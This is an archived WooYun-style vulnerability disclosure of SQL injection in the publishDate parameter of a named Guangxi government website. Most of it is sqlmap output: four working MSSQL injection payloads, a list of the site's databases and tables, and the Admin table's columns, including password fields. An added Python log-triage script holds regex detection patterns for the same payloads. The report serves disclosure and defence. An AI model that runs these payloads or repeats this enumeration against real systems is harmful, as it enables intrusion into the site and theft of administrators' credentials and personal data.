WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
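2014-07-27: Details reported to the vendor; awaiting vendor handling
2014-07-31: Vendor confirmed; details disclosed to the vendor only
2014-08-10: Details disclosed to core white hats and experts in related fields
2014-08-20: Details disclosed to regular white hats
2014-08-30: Details disclosed to intern white hats
2014-09-10: Details disclosed to the public

A web page coding flaw results in a SQL injection vulnerability: input is concatenated into a SQL statement and sent to the database for execution, which allows retrieving administrator data and executing system commands.

Vulnerable URL: http://www.gxgxw.gov.cn/CommonPage/ArticleSearchResults.aspx?publishDate=2014-07-01
Vulnerable parameter: publishDate
Method: GET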
Place: GET
Parameter: publishDate
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: publishDate=2014-05-30' AND 6919=6919 AND 'Ogma'='Ogma

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: publishDate=2014-05-30' AND 8263=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(97)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8263=8263) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(101)+CHAR(113))) AND 'DTVG'='DTVG

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: publishDate=2014-05-30'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: publishDate=2014-05-30' WAITFOR DELAY '0:0:5'--
Databases:

available databases [6]:
[*] db_gxw_ycfx
[*] gxjw
[*] master
[*] model
[*] msdb
[*] tempdb

Tables in gxjw:

Database: gxjw
[24 tables]
+---------------------+
| Admin               |
| Article             |
| ArticleClass        |
| Department          |
| Documents           |
| EmailOfLeaders      |
| GraphicInfo         |
| GraphicType         |
| Photos              |
| Projects            |
| PublicApplication   |
| Questions           |
| Roles               |
| SpecialArticleClass |
| SugarPrice          |
| Suggestions         |
| Topic               |
| UserGroup           |
| Users               |
| View_Admin          |
| View_Article        |
| View_GraphInfo      |
| View_SpecialArticle |
| VisitsAndLetters    |
+---------------------+

Columns of the Admin table:

Database: gxjw
Table: Admin
[18 columns]
+----------------+------+
| Column         | Type |
+----------------+------+
| adminId        | int  |
| deptId         | int  |
| email          | char |
| homeAddress    | char |
| isChecked      | bit  |
| lastLoginIP    | char |
| lastLoginTime  | char |
| lastLogoutTime | char |
| loginName      | char |
| loginTimes     | int  |
| mobilePhone    | char |
| officeAddress  | char |
| officePhone    | char |
| password       | char |
| peoples        | char |
| realName       | char |
| roleId         | int  |
| sex            | char |
+----------------+------+

Data (raw data, decoded passwords, last two characters of personal names starred):
Check the website for injection vulnerabilities, and check the website for traces of system command execution.
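One way to carry out the log side of this check, as an added example that is not part of the original report: it flags every request to the affected page whose publishDate is not a plain YYYY-MM-DD date and labels it with the sqlmap technique markers listed above. It assumes the site's IIS access logs are in W3C extended format with a #Fields header; the names is_plain_date, triage, MARKERS and SAMPLE are hypothetical, and the sample log lines are constructed.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs

# Markers taken from the sqlmap techniques listed in this report (MSSQL).
MARKERS = {
    "time-based or stacked": re.compile(r"WAITFOR\s+DELAY", re.I),
    "error-based": re.compile(r"CONVERT\s*\(\s*INT", re.I),
    "boolean-based": re.compile(r"'\s*AND\s+\d+\s*=\s*\d+", re.I),
}

def is_plain_date(value):
    """Allowlist check: exactly YYYY-MM-DD and a real calendar date."""
    if not re.fullmatch(r"\d{4}-\d{2}-\d{2}", value):
        return False
    try:
        datetime.strptime(value, "%Y-%m-%d")
    except ValueError:
        return False
    return True

def triage(lines, stem="/CommonPage/ArticleSearchResults.aspx", param="publishDate"):
    """Return (line_no, client_ip, labels) for each request whose param is not a plain date."""
    cols, findings = [], []
    for no, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            cols = line.split()[1:]  # column names for the rows that follow
            continue
        if line.startswith("#") or not cols:
            continue
        row = dict(zip(cols, line.split()))
        if row.get("cs-uri-stem", "").lower() != stem.lower():
            continue
        for value in parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True).get(param, []):
            if not is_plain_date(value):
                labels = [n for n, rx in MARKERS.items() if rx.search(value)] or ["not a date"]
                findings.append((no, row.get("c-ip"), labels))
    return findings

# Constructed sample log (documentation IP ranges); not taken from the affected site.
SAMPLE = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2014-07-20 08:00:01 GET /CommonPage/ArticleSearchResults.aspx publishDate=2014-07-01 192.0.2.10 200
2014-07-20 08:00:05 GET /CommonPage/ArticleSearchResults.aspx publishDate=2014-05-30'+AND+6919=6919+AND+'Ogma'='Ogma 198.51.100.7 200
2014-07-20 08:00:09 GET /CommonPage/ArticleSearchResults.aspx publishDate=2014-05-30'%3B+WAITFOR+DELAY+'0:0:5'-- 198.51.100.7 200
2014-07-20 08:00:12 GET /CommonPage/ArticleSearchResults.aspx publishDate=2014-02-30 192.0.2.11 200
""".splitlines()

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

The same allowlist check (is_plain_date) is what the page's handler should apply to publishDate before the value reaches a parameterized query.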
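Severity: High
Vulnerability Rank: 11
Confirmed at: 2014-07-31 21:56
CNVD confirmed and reproduced the situation described. It has been forwarded by CNCERT to the Guangxi sub-center, which will follow up and coordinate with the organization managing the website to handle it.
None yet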